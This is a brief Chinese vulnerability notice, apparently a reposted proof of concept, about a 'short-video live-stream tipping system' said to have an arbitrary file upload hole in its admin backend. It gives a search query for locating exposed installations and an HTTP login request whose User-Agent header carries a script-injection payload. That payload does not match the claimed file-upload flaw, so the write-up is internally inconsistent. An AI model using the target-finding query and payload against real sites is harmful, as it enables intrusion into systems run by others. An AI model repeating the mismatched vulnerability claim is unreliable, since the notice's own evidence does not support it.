登录 白背景
源码

短视频直播打赏系统存在后台任意文件上传漏洞

一、漏洞简介

短视频直播打赏系统存在后台任意文件上传漏洞

二、影响版本

  • 短视频直播打赏系统

三、资产测绘

"Location: https://m.baidu.com" && domain!="baidu.com"

1723399583430-30333a2d-4898-4493-8c1b-ebe0693b3381.png

四、漏洞复现

POST /admin/login/index.html HTTP/1.1
Host: 
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
User-Agent: 1234<script>alert("niubi")</script>

username=admin1&password=123123123&keep_login=0

1723399857040-902c6175-34d6-44dd-b503-472c8cd8dec3.png

1723399812267-70b6b8d1-344b-4a4c-8a1a-a6c90ed7835c.png

原文: https://www.yuque.com/xiaokp7/ocvun2/fzvfhdt68t8s1zoz